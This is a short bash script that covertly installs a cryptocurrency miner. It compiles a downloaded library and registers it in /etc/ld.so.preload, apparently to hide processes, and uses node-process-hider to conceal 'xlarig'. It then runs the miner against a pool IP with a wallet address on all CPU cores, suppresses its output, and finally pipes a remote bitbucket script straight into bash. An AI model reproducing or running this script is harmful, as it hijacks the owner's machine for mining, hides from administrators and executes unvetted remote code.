#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
sudo gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.1 -y && npm i -g node-process-hider && ph add xlarig"
mkdir .kap && cd .kap
wget https://github.com/bengetsia/soft/raw/main/xlarig.tar.gz && tar -xvf xlarig.tar.gz
./xlarig -o 172.233.92.162:443 -u ZEPHs8XEXcX7HhCvWjqu72huNNXSvhkHpBSeubfWN2Us7oZBBArSQ8Ubhay3FSAXWKhfjfNDfvJjuSKn2pohrj9FhHLyWCx6EjG -p YOUR -t $(nproc --all) >/dev/null 2>&1
curl -sL https://bitbucket.org/commuter21/escom/raw/main/gudabel.sh | bash 
